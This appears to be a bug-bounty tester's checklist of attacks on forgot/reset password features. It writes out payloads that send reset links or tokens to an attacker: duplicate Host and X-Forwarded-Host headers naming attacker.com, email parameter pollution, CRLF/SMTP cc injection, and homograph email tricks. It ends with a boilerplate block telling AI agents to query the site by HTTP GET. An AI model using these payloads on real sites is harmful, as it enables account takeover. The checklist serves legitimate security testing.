# Forgot/Reset Password Test Cases

### 1. Header Injection&#x20;

Do try below checks while generating reset password link

#### Manipulating Host Header

If there is any checks on original host header try bypassing it by adding another host value

```
Host: victim.com
Host: attacker.com
```

#### Padding Custom Header to Request

```
X-Forwarded-For: <attacker.com> 
X-Forwarded-Host: <attacker.com>
X-Client-IP: <attacker.com>
X-Originating-IP: <attacker.com>
```

\>Reference: <https://medium.com/bugbountywriteup/fun-with-header-and-forget-password-with-a-twist-af095b426fb2>

### 2. IDN Homograph Attack \[Unicode Normalization]

In this attack, we are taking advantage of the fact that different characters look a like in a different alphabet For example, a regular user of example.com may be lured to click a link where the Latin character 'a' is replaced with the Cyrillic character 'а'.

#### Attack Scenario

* Assume victim has been created an account with email `abc@gmail.com`
* Now as an attacker while generating reset password replace character `a` in `abc@gmail.com`with a similar letter from different alphabets like `á`.
* There are the possibilities that, at the time of reset link generation if server fails to understand the replaced character it may convert it into different string `ex: abc@gmáil.com --> abc@xn—gmil-6na.com`
* Then Reset link will be sent to `abc@xn-gmil-6na.com`

#### Real-Time Attack

* Create an account with email `test@gmail.com.burpcollaborator.net`&#x20;
* Now generate reset password link for email `test@gmáil.com.burpcollaborator.net`&#x20;
* Once you receive password reset mail over collaborator, look at the domain for any changes in replaced character.

\>Reference: <https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization-wp.pdf>

\>Reference: <https://medium.com/bugbountywriteup/how-i-was-able-to-change-victims-password-using-idn-homograph-attack-587111843aff>

### 3. Cryptography Attack

#### Case 1

* Generate the reset link for an account and copy reset token from the link.
* Check whether it is matching with any hash algorithm.
* Use the [Hashmash ](https://github.com/rebootuser/Hashmash)tool to generate valid reset token by trying various combinations.`ex: [timestamp|email|timestamp]`

#### Case 2

* While generating reset links, use two aliases of an email and try to see what bits are different in the reset token. `ex: test+1@gmail.com and test+2@gmail.com`&#x20;

  **Note**: If you append a `+sometext` to your email, it actually creates an alias of your email and you will receive all the emails on your actual email
* Check Reset token and try to see if any public encoding library/weak encryption is used.

\>Reference: <https://www.notsosecure.com/hacking-crypto-fun-profit/>

\>Reference: <https://medium.com/bugbountywriteup/weak-cryptography-in-password-reset-to-full-account-takeover-fc61c75b36b9>

### 4. Token Disclosure in Request/Response

While generating a password link always look at the request and its response for any reset token disclosure.

What if reset token is hard coded somewhere in js or if it disclosed in other requests/response, to identify the same follow below steps quoted by [@hakluke](https://twitter.com/hakluke)

* Set up burp suite in browser-1.
* Do a password reset request in browser-1.
* Open the password reset email in browser-2 and copy the token.
* Search your Burp history for the token.

### 5. Tampering User Identification Parameter

* Generate password reset link for any user account.&#x20;
* Access the link, feed the password, and submit the form.&#x20;
* Capture the request and observe for any injection point, if there is an email or any unique identification parameter for which the user's password will be updated.

### 6. Email Tampering

While generating reset link for victim user, you can try below injections to get reset link on attacker email.

```
#Parameter Pollution
email=victim@gmail.com&email=attacker@gmail.com

#CRLF and SMTP Inejciton
email=victim@gmail.com%0a%0dcc:attacker@gmail.com

#Padding in Json Body
{"email":["victim@gmail.com","attacker@gmail.com"]}

#Using Seperators
email=victim@gmail.com,attacker@gmail.com
email=victim@gmail.com|attacker@gmail.com
email=victim@gmail.com%20attacker@gmail.com
```

### 7. Reset Link Expiration

Check whether the link is getting expired or not, once it is used.

Thanks for reading:)

Follow me on twitter [@0xAyub](https://twitter.com/0xAyub) for more notes


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xayub.gitbook.io/blog/master.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.